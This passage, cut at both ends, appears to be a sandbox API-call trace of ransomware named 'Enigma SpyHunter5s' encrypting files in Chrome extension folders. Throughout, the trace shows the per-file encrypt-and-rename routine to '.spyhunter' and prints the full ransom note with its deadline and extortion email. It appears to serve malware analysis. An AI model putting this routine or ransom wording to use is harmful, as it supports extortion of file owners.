Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") returned 155 [0159.093] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.093] GetProcessHeap () returned 0x2c0000 [0159.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.093] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea34*=0xde, lpOverlapped=0x0) returned 1 [0159.094] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.094] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x270ea34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea34*=0xde, lpOverlapped=0x0) returned 1 [0159.094] GetProcessHeap () returned 0x2c0000 [0159.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.094] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.095] WriteFile (in: hFile=0x178, lpBuffer=0x270ea74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea34, lpOverlapped=0x0 | out: lpBuffer=0x270ea74*, lpNumberOfBytesWritten=0x270ea34*=0x4, lpOverlapped=0x0) returned 1 [0159.095] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea34, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea34*=0x30, lpOverlapped=0x0) returned 1 [0159.095] CloseHandle (hObject=0x178) returned 1 [0159.095] GetProcessHeap () returned 0x2c0000 [0159.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.095] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.spyhunter") returned 165 [0159.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0159.096] GetProcessHeap () returned 0x2c0000 [0159.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.096] GetProcessHeap () returned 0x2c0000 [0159.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.096] GetProcessHeap () returned 0x2c0000 [0159.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d858 | out: hHeap=0x2c0000) returned 1 [0159.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.097] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.097] WriteFile (in: hFile=0x178, lpBuffer=0x270e9ab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x270e9ab*, lpNumberOfBytesWritten=0x270ead4*=0x127, lpOverlapped=0x0) returned 1 [0159.098] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.098] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ead4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ead4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.098] CloseHandle (hObject=0x178) returned 1 [0159.098] GetProcessHeap () returned 0x2c0000 [0159.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d6d0 | out: hHeap=0x2c0000) returned 1 [0159.098] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea70 | out: pbBuffer=0x270ea70) returned 1 [0159.098] GetProcessHeap () returned 0x2c0000 [0159.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.099] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea68*=0x30) returned 1 [0159.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.099] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") returned 155 [0159.099] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.099] GetProcessHeap () returned 0x2c0000 [0159.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.099] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea2c*=0xd2, lpOverlapped=0x0) returned 1 [0159.100] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.100] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x270ea2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea2c*=0xd2, lpOverlapped=0x0) returned 1 [0159.100] GetProcessHeap () returned 0x2c0000 [0159.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.101] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.101] WriteFile (in: hFile=0x178, lpBuffer=0x270ea6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea2c, lpOverlapped=0x0 | out: lpBuffer=0x270ea6c*, lpNumberOfBytesWritten=0x270ea2c*=0x4, lpOverlapped=0x0) returned 1 [0159.101] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea2c*=0x30, lpOverlapped=0x0) returned 1 [0159.101] CloseHandle (hObject=0x178) returned 1 [0159.102] GetProcessHeap () returned 0x2c0000 [0159.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.102] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.spyhunter") returned 165 [0159.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.spyhunter")) returned 1 [0159.104] GetProcessHeap () returned 0x2c0000 [0159.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.104] GetProcessHeap () returned 0x2c0000 [0159.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.104] GetProcessHeap () returned 0x2c0000 [0159.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d548 | out: hHeap=0x2c0000) returned 1 [0159.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.105] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.105] WriteFile (in: hFile=0x178, lpBuffer=0x270e9a3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eacc, lpOverlapped=0x0 | out: lpBuffer=0x270e9a3*, lpNumberOfBytesWritten=0x270eacc*=0x127, lpOverlapped=0x0) returned 1 [0159.106] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.106] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eacc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eacc*=0x2ac, lpOverlapped=0x0) returned 1 [0159.106] CloseHandle (hObject=0x178) returned 1 [0159.106] GetProcessHeap () returned 0x2c0000 [0159.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d3c0 | out: hHeap=0x2c0000) returned 1 [0159.106] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea68 | out: pbBuffer=0x270ea68) returned 1 [0159.106] GetProcessHeap () returned 0x2c0000 [0159.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.106] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea60*=0x30) returned 1 [0159.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0159.107] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.107] GetProcessHeap () returned 0x2c0000 [0159.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.107] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea24*=0x11e, lpOverlapped=0x0) returned 1 [0159.108] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffee2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.108] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x270ea24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea24*=0x11e, lpOverlapped=0x0) returned 1 [0159.108] GetProcessHeap () returned 0x2c0000 [0159.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.108] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.108] WriteFile (in: hFile=0x178, lpBuffer=0x270ea64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea24, lpOverlapped=0x0 | out: lpBuffer=0x270ea64*, lpNumberOfBytesWritten=0x270ea24*=0x4, lpOverlapped=0x0) returned 1 [0159.109] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea24*=0x30, lpOverlapped=0x0) returned 1 [0159.109] CloseHandle (hObject=0x178) returned 1 [0159.109] GetProcessHeap () returned 0x2c0000 [0159.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.109] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.spyhunter") returned 165 [0159.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0159.110] GetProcessHeap () returned 0x2c0000 [0159.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.110] GetProcessHeap () returned 0x2c0000 [0159.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.208] GetProcessHeap () returned 0x2c0000 [0159.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d238 | out: hHeap=0x2c0000) returned 1 [0159.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.209] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.209] WriteFile (in: hFile=0xb0, lpBuffer=0x270e99b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eac4, lpOverlapped=0x0 | out: lpBuffer=0x270e99b*, lpNumberOfBytesWritten=0x270eac4*=0x127, lpOverlapped=0x0) returned 1 [0159.210] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.210] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eac4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eac4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.210] CloseHandle (hObject=0xb0) returned 1 [0159.211] GetProcessHeap () returned 0x2c0000 [0159.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3a70 | out: hHeap=0x2c0000) returned 1 [0159.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.212] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.212] WriteFile (in: hFile=0xb0, lpBuffer=0x270e997*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eac0, lpOverlapped=0x0 | out: lpBuffer=0x270e997*, lpNumberOfBytesWritten=0x270eac0*=0x127, lpOverlapped=0x0) returned 1 [0159.213] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.213] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eac0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eac0*=0x2ac, lpOverlapped=0x0) returned 1 [0159.213] CloseHandle (hObject=0xb0) returned 1 [0159.213] GetProcessHeap () returned 0x2c0000 [0159.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ab80 | out: hHeap=0x2c0000) returned 1 [0159.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.215] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.215] WriteFile (in: hFile=0xb0, lpBuffer=0x270e993*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eabc, lpOverlapped=0x0 | out: lpBuffer=0x270e993*, lpNumberOfBytesWritten=0x270eabc*=0x127, lpOverlapped=0x0) returned 1 [0159.216] lstrlenA 